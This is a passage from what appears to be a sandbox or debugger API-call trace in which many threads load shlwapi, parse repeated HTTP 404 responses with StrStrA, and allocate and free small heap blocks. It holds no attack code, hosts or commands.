GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.515] GetProcessHeap () returned 0x690000 [0280.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0280.515] GetProcessHeap () returned 0x690000 [0280.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0280.515] GetProcessHeap () returned 0x690000 [0280.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 415 os_tid = 0x1670 [0280.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.719] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.719] GetProcessHeap () returned 0x690000 [0280.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0280.719] GetProcessHeap () returned 0x690000 [0280.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0280.719] GetProcessHeap () returned 0x690000 [0280.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 416 os_tid = 0x1674 [0280.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.903] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.903] GetProcessHeap () returned 0x690000 [0280.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0280.903] GetProcessHeap () returned 0x690000 [0280.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0280.903] GetProcessHeap () returned 0x690000 [0280.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 417 os_tid = 0x1690 [0281.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.089] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.089] GetProcessHeap () returned 0x690000 [0281.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0281.089] GetProcessHeap () returned 0x690000 [0281.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0281.089] GetProcessHeap () returned 0x690000 [0281.090] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 418 os_tid = 0x169c [0281.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.364] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.364] GetProcessHeap () returned 0x690000 [0281.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0281.364] GetProcessHeap () returned 0x690000 [0281.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0281.364] GetProcessHeap () returned 0x690000 [0281.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 419 os_tid = 0x16a8 [0281.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.597] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.597] GetProcessHeap () returned 0x690000 [0281.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0281.597] GetProcessHeap () returned 0x690000 [0281.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0281.597] GetProcessHeap () returned 0x690000 [0281.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 420 os_tid = 0x16ac [0281.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.835] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.835] GetProcessHeap () returned 0x690000 [0281.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0281.835] GetProcessHeap () returned 0x690000 [0281.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0281.835] GetProcessHeap () returned 0x690000 [0281.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 421 os_tid = 0x16b8 [0281.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.990] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.990] GetProcessHeap () returned 0x690000 [0281.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0281.990] GetProcessHeap () returned 0x690000 [0281.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0281.990] GetProcessHeap () returned 0x690000 [0281.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 422 os_tid = 0x16c0 [0282.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.155] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.155] GetProcessHeap () returned 0x690000 [0282.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0282.155] GetProcessHeap () returned 0x690000 [0282.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0282.155] GetProcessHeap () returned 0x690000 [0282.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 423 os_tid = 0x16c4 [0282.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.395] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.395] GetProcessHeap () returned 0x690000 [0282.395] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0282.395] GetProcessHeap () returned 0x690000 [0282.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0282.395] GetProcessHeap () returned 0x690000 [0282.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 424 os_tid = 0x16c8 [0282.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.595] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.595] GetProcessHeap () returned 0x690000 [0282.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0282.595] GetProcessHeap () returned 0x690000 [0282.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0282.595] GetProcessHeap () returned 0x690000 [0282.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 425 os_tid = 0x16d0 [0282.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.773] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.773] GetProcessHeap () returned 0x690000 [0282.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0282.773] GetProcessHeap () returned 0x690000 [0282.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0282.773] GetProcessHeap () returned 0x690000 [0282.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 426 os_tid = 0x16d4 [0282.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.932] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.932] GetProcessHeap () returned 0x690000 [0282.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0282.932] GetProcessHeap () returned 0x690000 [0282.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0282.932] GetProcessHeap () returned 0x690000 [0282.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 427 os_tid = 0x16d8 [0283.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.169] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.169] GetProcessHeap () returned 0x690000 [0283.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0283.169] GetProcessHeap () returned 0x690000 [0283.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0283.169] GetProcessHeap () returned 0x690000 [0283.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 428 os_tid = 0x16e0 [0283.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.401] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.401] GetProcessHeap () returned 0x690000 [0283.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0283.401] GetProcessHeap () returned 0x690000 [0283.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0283.402] GetProcessHeap () returned 0x690000 [0283.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 429 os_tid = 0x16e8 [0283.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.576] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.576] GetProcessHeap () returned 0x690000 [0283.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0283.576] GetProcessHeap () returned 0x690000 [0283.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0283.576] GetProcessHeap () returned 0x690000 [0283.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 430 os_tid = 0x16ec [0283.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.783] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.783] GetProcessHeap () returned 0x690000 [0283.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0283.783] GetProcessHeap () returned 0x690000 [0283.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0283.784] GetProcessHeap () returned 0x690000 [0283.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 431 os_tid = 0x16f0 [0283.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.973] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.975] GetProcessHeap () returned 0x690000 [0283.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0283.975] GetProcessHeap () returned 0x690000 [0283.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0283.975] GetProcessHeap () returned 0x690000 [0283.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 432 os_tid = 0x16f4 [0284.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.153] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.153] GetProcessHeap () returned 0x690000 [0284.153] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0284.153] GetProcessHeap () returned 0x690000 [0284.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0284.153] GetProcessHeap () returned 0x690000 [0284.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 433 os_tid = 0x1700 [0284.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.355] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.355] GetProcessHeap () returned 0x690000 [0284.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0284.355] GetProcessHeap () returned 0x690000 [0284.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0284.356] GetProcessHeap () returned 0x690000 [0284.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 434 os_tid = 0x1708 [0284.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.528] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.528] GetProcessHeap () returned 0x690000 [0284.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0284.528] GetProcessHeap () returned 0x690000 [0284.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0284.528] GetProcessHeap () returned 0x690000 [0284.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 435 os_tid = 0x1710 [0284.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.739] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.739] GetProcessHeap () returned 0x690000 [0284.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0284.739] GetProcessHeap () returned 0x690000 [0284.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0284.739] GetProcessHeap () returned 0x690000 [0284.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 436 os_tid = 0x1718 [0284.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.898] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.898] GetProcessHeap () returned 0x690000 [0284.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0284.898] GetProcessHeap () returned 0x690000 [0284.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0284.898] GetProcessHeap () returned 0x690000 [0284.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 437 os_tid = 0x171c [0285.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.056] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.056] GetProcessHeap () returned 0x690000 [0285.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0285.056] GetProcessHeap () returned 0x690000 [0285.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0285.056] GetProcessHeap () returned 0x690000 [0285.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 438 os_tid = 0x1720 [0285.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.264] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.264] GetProcessHeap () returned 0x690000 [0285.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0285.264] GetProcessHeap () returned 0x690000 [0285.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0285.264] GetProcessHeap () returned 0x690000 [0285.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 439 os_tid = 0x1724 [0285.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.480] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.480] GetProcessHeap () returned 0x690000 [0285.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0285.480] GetProcessHeap () returned 0x690000 [0285.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0285.480] GetProcessHeap () returned 0x690000 [0285.481] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 440 os_tid = 0x1740 [0285.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.657] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.657] GetProcessHeap () returned 0x690000 [0285.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0285.657] GetProcessHeap () returned 0x690000 [0285.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0285.657] GetProcessHeap () returned 0x690000 [0285.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 441 os_tid = 0x174c [0285.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.852] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.852] GetProcessHeap () returned 0x690000 [0285.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0285.853] GetProcessHeap () returned 0x690000 [0285.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0285.853] GetProcessHeap () returned 0x690000 [0285.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 442 os_tid = 0x1750 [0286.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.048] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.048] GetProcessHeap () returned 0x690000 [0286.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0286.048] GetProcessHeap () returned 0x690000 [0286.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0286.048] GetProcessHeap () returned 0x690000 [0286.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 443 os_tid = 0x1754 [0286.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.284] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.284] GetProcessHeap () returned 0x690000 [0286.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0286.284] GetProcessHeap () returned 0x690000 [0286.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0286.284] GetProcessHeap () returned 0x690000 [0286.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 444 os_tid = 0x1760 [0286.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.465] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.465] GetProcessHeap () returned 0x690000 [0286.465] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0286.465] GetProcessHeap () returned 0x690000 [0286.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0286.465] GetProcessHeap () returned 0x690000 [0286.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 445 os_tid = 0x1764 [0286.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.744] StrStrA 